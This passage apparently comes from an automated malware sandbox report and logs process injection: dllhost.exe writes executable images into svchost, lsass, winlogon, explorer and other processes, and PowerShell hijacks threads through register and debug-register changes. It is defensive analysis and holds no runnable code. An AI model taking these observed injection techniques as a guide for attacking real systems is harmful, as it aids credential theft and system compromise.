Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC29790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25235280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21EC07B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 2527DEB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 286D7CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC29790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25235280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D547800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21EC07B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 286D7CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D547800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 19192FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 19193100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 29BC05B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1FAFFD50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2271B950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22735E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1DAF18C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1DAF1910000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2127EAE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 176E8750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CD8B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CF3050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dllhost.exe

Memory written: PID: 4056 base: 8B20000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 6720	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 4332
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 1796

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread register set: 6720 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: D10000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: C33C0BB010
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F1CA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F1CD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1630000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A1A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 263841B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E120000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D959C80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 8B20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E120000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D959C80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 29BB2810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 29BB2810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: CA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
